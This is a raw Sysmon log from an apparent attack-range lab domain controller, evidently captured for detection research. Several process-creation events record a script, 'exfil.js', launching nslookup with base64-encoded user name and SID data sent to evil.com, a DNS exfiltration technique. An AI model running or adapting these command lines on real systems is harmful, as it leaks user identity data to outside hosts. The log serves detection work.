354300x8000000000000000210468Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.649{00000000-0000-0000-0000-000000000000}3736<unknown process>-udptruefalse127.0.0.1-50786-false127.0.0.1-53domain 10341000x8000000000000000210467Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.897{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210466Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.897{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210465Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.897{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000210464Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.514{00000000-0000-0000-0000-000000000000}7556<unknown process>-udpfalsefalse127.0.0.1-50779-false127.0.0.1-53domain 10341000x8000000000000000210463Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.897{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EF-629A-4344-000000005F02}5168C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210462Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.897{2E1864BB-18EF-629A-4144-000000005F02}77081636C:\Windows\system32\cmd.exe{2E1864BB-18EF-629A-4344-000000005F02}5168C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210461Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.898{2E1864BB-18EF-629A-4344-000000005F02}5168C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EF-629A-4144-000000005F02}7708C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcwgmlhs.tmp 2>&1 354300x8000000000000000210460Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.999{00000000-0000-0000-0000-000000000000}7788<unknown process>-udpfalsefalse127.0.0.1-50768-false127.0.0.1-53domain 354300x8000000000000000210459Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.925{00000000-0000-0000-0000-000000000000}7744<unknown process>-udptruefalse127.0.0.1-50765-false127.0.0.1-53domain 354300x8000000000000000210458Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.757{00000000-0000-0000-0000-000000000000}7408<unknown process>-udptruefalse127.0.0.1-50760-false127.0.0.1-53domain 354300x8000000000000000210457Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.756{00000000-0000-0000-0000-000000000000}7408<unknown process>-udpfalsefalse127.0.0.1-50759-false127.0.0.1-53domain 354300x8000000000000000210456Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.674{00000000-0000-0000-0000-000000000000}6432<unknown process>-udpfalsefalse127.0.0.1-50756-false127.0.0.1-53domain 354300x8000000000000000210455Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.674{00000000-0000-0000-0000-000000000000}6432<unknown process>-udpfalsefalse127.0.0.1-50755-false127.0.0.1-53domain 354300x8000000000000000210454Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.609{00000000-0000-0000-0000-000000000000}3868<unknown process>-udpfalsefalse127.0.0.1-50754-false127.0.0.1-53domain 354300x8000000000000000210453Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.609{00000000-0000-0000-0000-000000000000}3868<unknown process>-udptruefalse127.0.0.1-50754-false127.0.0.1-53domain 354300x8000000000000000210452Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.609{00000000-0000-0000-0000-000000000000}3868<unknown process>-udpfalsefalse127.0.0.1-50753-false127.0.0.1-53domain 354300x8000000000000000210451Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.609{00000000-0000-0000-0000-000000000000}3868<unknown process>-udptruefalse127.0.0.1-50752-false127.0.0.1-53domain 22542200x8000000000000000210450Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.894{00000000-0000-0000-0000-000000000000}5552evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000210449Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.813{00000000-0000-0000-0000-000000000000}4860evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000210448Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.722{00000000-0000-0000-0000-000000000000}5836evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000210447Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.639{00000000-0000-0000-0000-000000000000}5928evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000210446Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.559{00000000-0000-0000-0000-000000000000}5960evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000210445Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.492{00000000-0000-0000-0000-000000000000}7616evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000210444Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.414{00000000-0000-0000-0000-000000000000}5516evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000210443Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.879{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18EF-629A-4244-000000005F02}7524C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210442Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.878{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EF-629A-4244-000000005F02}7524C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x8000000000000000210441Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.327{00000000-0000-0000-0000-000000000000}2316evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000210440Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.248{00000000-0000-0000-0000-000000000000}6560evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000210439Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.149{00000000-0000-0000-0000-000000000000}4780evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000210438Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.860{2E1864BB-18EF-629A-4244-000000005F02}75242244C:\Windows\system32\conhost.exe{2E1864BB-18EF-629A-4144-000000005F02}7708C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210437Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.860{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EF-629A-4244-000000005F02}7524C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210436Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.844{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210435Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.844{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210434Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.844{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210433Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.844{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210432Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.844{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EF-629A-4144-000000005F02}7708C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210431Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.844{2E1864BB-18E0-629A-6742-000000005F02}39767272C:\Windows\System32\WScript.exe{2E1864BB-18EF-629A-4144-000000005F02}7708C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210430Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.854{2E1864BB-18EF-629A-4144-000000005F02}7708C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcwgmlhs.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000210429Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.844{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlltciii.tmpMD5=20783302D7601A2AA375A824723F16E5,SHA256=71E896EDC683926A4A0C6EDE66358751D292E4E8C82F0E9349EA1FBAA2ABF001,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000210428Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.829{2E1864BB-18EF-629A-3F44-000000005F02}44842104C:\Windows\system32\conhost.exe{2E1864BB-18EF-629A-4044-000000005F02}7204C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210427Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.829{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210426Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.829{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210425Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.829{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210424Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.829{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210423Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.829{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EF-629A-4044-000000005F02}7204C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210422Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.829{2E1864BB-18EF-629A-3E44-000000005F02}42127664C:\Windows\system32\cmd.exe{2E1864BB-18EF-629A-4044-000000005F02}7204C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210421Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.830{2E1864BB-18EF-629A-4044-000000005F02}7204C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAw evil.com 